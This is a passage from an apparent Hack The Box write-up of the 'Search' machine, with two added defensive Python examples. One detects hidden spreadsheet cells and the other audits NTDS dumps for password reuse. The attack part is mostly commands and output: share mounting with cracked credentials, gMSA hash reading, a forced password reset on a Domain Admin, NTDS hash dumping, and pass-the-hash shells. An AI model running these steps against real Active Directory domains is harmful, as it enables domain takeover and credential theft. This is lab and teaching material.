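        '<row r="3" hidden="1"><c r="A3"><v>42</v></c></row>'
        "</sheetData>"
        '<sheetProtection sheet="1" objects="1" scenarios="1"/>'
        "</worksheet>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", shared)
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
    return buf.getvalue()


def column_number(cell_ref: str) -> int:
    """'A1' -> 1, 'C2' -> 3, 'AA7' -> 27 (1-based, like <col min/max>)."""
    n = 0
    for ch in re.match(r"[A-Z]+", cell_ref).group(0):
        n = n * 26 + ord(ch) - ord("A") + 1
    return n


def shared_strings(zf: zipfile.ZipFile) -> list:
    """The shared string table; rich-text runs inside one <si> are joined."""
    try:
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    except KeyError:          # workbook without a shared string table
        return []
    tag_t = "{%s}t" % NS["m"]
    return ["".join(t.text or "" for t in si.iter(tag_t)) for si in root.findall("m:si", NS)]


def hidden_cells(xlsx_bytes: bytes):
    """Return ([(sheet_part, cell_ref, value), ...], {protected sheet parts}).
    A cell counts as hidden when its column or its row carries hidden="1"."""
    found, protected = [], set()
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        strings = shared_strings(zf)
        parts = sorted(n for n in zf.namelist() if re.fullmatch(r"xl/worksheets/sheet\d+\.xml", n))
        for part in parts:
            root = ET.fromstring(zf.read(part))
            if root.find("m:sheetProtection", NS) is not None:
                protected.add(part)
            hidden_cols = set()
            for col in root.findall("m:cols/m:col", NS):
                if col.get("hidden") in TRUE:
                    hidden_cols.update(range(int(col.get("min")), int(col.get("max")) + 1))
            for row in root.findall("m:sheetData/m:row", NS):
                row_hidden = row.get("hidden") in TRUE
                for c in row.findall("m:c", NS):
                    ref = c.get("r")
                    if not (row_hidden or column_number(ref) in hidden_cols):
                        continue
                    v = c.find("m:v", NS)
                    if v is None:
                        continue
                    # t="s" means the value is an index into the shared string table
                    value = strings[int(v.text)] if c.get("t") == "s" else v.text
                    found.append((part, ref, value))
    return found, protected


if __name__ == "__main__":
    cells, protected = hidden_cells(build_sample_xlsx())
    for part, ref, value in cells:
        print(f"{part} {ref}: {value!r}")
    print("protected:", sorted(protected))
```

Pointing hidden_cells at the bytes of a real workbook instead of build_sample_xlsx() gives the same report for it. The practical lesson for anyone keeping credentials in a spreadsheet is the one this box teaches: hiding and protecting cells only changes what Excel draws, so the file has to be encrypted (or the secrets kept out of it) to protect anything.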
I created a wordlist from these records and brute-forced it against user sierra.frye, and got a hit.

I mounted the RedirectedFolders$ share as user sierra.frye.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ sudo mount -t cifs "\\\\$ip\\Redirectedfolders$" ./mount -o 'username=sierra.frye,password=$$49=wide=STRAIGHT=jordan=28$$18'
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ cd mount/sierra.frye
┌──(kali㉿kali)-[~/…/machines/Search/mount/sierra.frye]
└─$ tree
.
├── Desktop
│ ├── $RECYCLE.BIN
│ │ └── desktop.ini
│ ├── @rce.scf
│ ├── Microsoft Edge.lnk
│ ├── desktop.ini
│ └── user.txt
├── Documents
│ ├── $RECYCLE.BIN
│ │ └── desktop.ini
│ └── desktop.ini
├── Downloads
│ ├── $RECYCLE.BIN
│ │ └── desktop.ini
│ ├── Backups
│ │ ├── search-RESEARCH-CA.p12
│ │ └── staff.pfx
│ └── desktop.ini
└── user.txt
There are two new files I hadn't seen before under the Backups folder: search-RESEARCH-CA.p12 and staff.pfx.
These two files can be imported into your browser to access the web application on port 443, which leads to the PowerShell Web Access console, but I took a different path :)
Get the flag
┌──(kali㉿kali)-[~/…/machines/Search/mount/sierra.frye]
└─$ cat user.txt
07129b5634467dbe9cxxxxxxxxxx
User Flag: 07129b5634467dbxxxxxxxxxxx
Shell as Administrator
User sierra.frye can PSRemote to the machine, as she is a member of BIRMINGHAM-ITSEC, which is a member of ITSEC.
* ITSEC has the privilege to read the GMSA password.
* The gMSA account BIR-ADFS-GMSA$ has GenericAll rights on user Tristan.davies, which is a member of the Domain Admins group.
So, if we can take over the sierra.frye user, we can reach Domain Admins via the attack path above.

More about the gMSA, from BloodHound:

Read the gMSA password with gMSADumper.py or NetExec:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nxc ldap $ip -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' --gmsa
<snip>
LDAPS 10.10.11.129 636 RESEARCH Account: BIR-ADFS-GMSA$ NTLM: e1e9fd9e46d0d747e1595167eedcec0f
Change the password of the TRISTAN.DAVIES account using the net rpc tool:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ pth-net rpc password "TRISTAN.DAVIES" 'P@ssword123!' -U "search.htb"/"BIR-ADFS-GMSA$"%"ffffffffffffffffffffffffffffffff":"e1e9fd9e46d0d747e1595167eedcec0f" -S "$ip"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u TRISTAN.DAVIES -p 'P@ssword123!'
SMB 10.10.11.129 445 RESEARCH [+] search.htb\TRISTAN.DAVIES:P@ssword123! (Pwn3d!)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ crackmapexec smb $ip -u TRISTAN.DAVIES -p 'P@ssword123!' --ntds
SMB 10.10.11.129 445 RESEARCH [+] search.htb\TRISTAN.DAVIES:P@ssword123! (Pwn3d!)
SMB 10.10.11.129 445 RESEARCH [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.11.129 445 RESEARCH Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c56xxxxxxxxxxxx:::
SMB 10.10.11.129 445 RESEARCH Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.129 445 RESEARCH krbtgt:502:aad3b435b51404eeaad3b435b51404ee:cd69d23e4383daa5b0f42d29dba9529a:::
SMB 10.10.11.129 445 RESEARCH search.htb\Santino.Benjamin:1194:aad3b435b51404eeaad3b435b51404ee:5e3c0abbe0b4163c5612afe25c69ced6:::
<snip>
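A dump like the one above is also where an assessor (or the domain's own admins, from a sanctioned extraction) would audit the credential population instead of only picking out the Administrator hash. The following Python is an added example, not part of the original write-up; it parses secretsdump-style user:rid:lmhash:nthash::: records, including the SMB/host prefix crackmapexec --ntds puts in front of each line, groups accounts by NT hash to surface password reuse, flags accounts whose NT hash is that of the empty string, and flags any account that still stores an LM hash. The sample dump is constructed: every hash in it is a placeholder, and the reuse between Administrator and a standard user in the sample simply mirrors the matching visible prefix of the two redacted hashes above without asserting anything about the real values.

```python
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string

# [SMB <ip> <port> <host>] [domain\]user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?:SMB\s+\S+\s+\d+\s+\S+\s+)?"                       # optional crackmapexec/NetExec prefix
    r"(?:(?P<domain>[^\\:\s]+)\\)?(?P<user>[^:\s]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample in the crackmapexec --ntds layout; every hash is a placeholder.
SAMPLE_DUMP = r"""
SMB 10.10.11.129 445 RESEARCH [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.11.129 445 RESEARCH Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:::
SMB 10.10.11.129 445 RESEARCH Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.129 445 RESEARCH krbtgt:502:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111:::
SMB 10.10.11.129 445 RESEARCH search.htb\Santino.Benjamin:1194:aad3b435b51404eeaad3b435b51404ee:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:::
SMB 10.10.11.129 445 RESEARCH search.htb\Legacy.User:1201:a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1:22222222222222222222222222222222:::
SMB 10.10.11.129 445 RESEARCH search.htb\Temp.Account:1202:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.11.129 445 RESEARCH RESEARCH$:1000:aad3b435b51404eeaad3b435b51404ee:33333333333333333333333333333333:::
"""


def parse_dump(text: str) -> list:
    """One dict per hash record; banner and status lines do not match and are skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            accounts.append(m.groupdict())
    return accounts


def audit(accounts: list) -> dict:
    """Group by NT hash and return the three findings a reviewer acts on."""
    by_nt = defaultdict(list)
    for a in accounts:
        by_nt[a["nt"].lower()].append(a["user"])
    return {
        # Same NT hash means same password. Machine accounts ($) stay in on
        # purpose: a computer sharing a user's password is worth a look too.
        "shared_nt_hash": {h: sorted(users) for h, users in by_nt.items()
                           if len(users) > 1 and h != EMPTY_NT},
        # Empty password. Guest (RID 501) is normally disabled, so confirm the
        # account state before raising that one.
        "empty_password": sorted(by_nt.get(EMPTY_NT, [])),
        # Anything other than the "no LM hash" marker means the password is at
        # most 14 characters and was stored with LM enabled: trivially crackable.
        "lm_hash_present": sorted(a["user"] for a in accounts
                                  if a["lm"].lower() != EMPTY_LM),
    }


if __name__ == "__main__":
    findings = audit(parse_dump(SAMPLE_DUMP))
    for nt, users in findings["shared_nt_hash"].items():
        print(f"[reuse] {nt}: {', '.join(users)}")
    for user in findings["empty_password"]:
        print(f"[empty] {user}")
    for user in findings["lm_hash_present"]:
        print(f"[lm]    {user}")
```

On the sample this reports one reuse group (Administrator and Santino.Benjamin), two empty-password accounts (Guest, Temp.Account) and one account with an LM hash (Legacy.User). Feeding it the saved output of the --ntds run, or a secretsdump .ntds file, works the same way because the prefix is optional in the pattern.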
Get the flag with NetExec
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ nxc smb $ip -u administrator -H 5e3c0abbe0b4163c56xxxxxxxxxxxx -x 'type C:\Users\Administrator\Desktop\root.txt'
SMB 10.10.11.129 445 RESEARCH [+] search.htb\administrator:5e3c0abbe0b4xxxxxxxxxx163c56x (Pwn3d!)
SMB 10.10.11.129 445 RESEARCH [+] Executed command via wmiexec
SMB 10.10.11.129 445 RESEARCH b2f761828983df3ff185cdc96604225d
Or access the machine with wmiexec.py
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Search]
└─$ impacket-wmiexec search.htb/administrator@$ip -hashes :5e3c0abbe0b4163c56xxxxxxxxxxx
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
search\administrator
Root Flag: b2f761828983df3ffxxxxxxxxxxxxx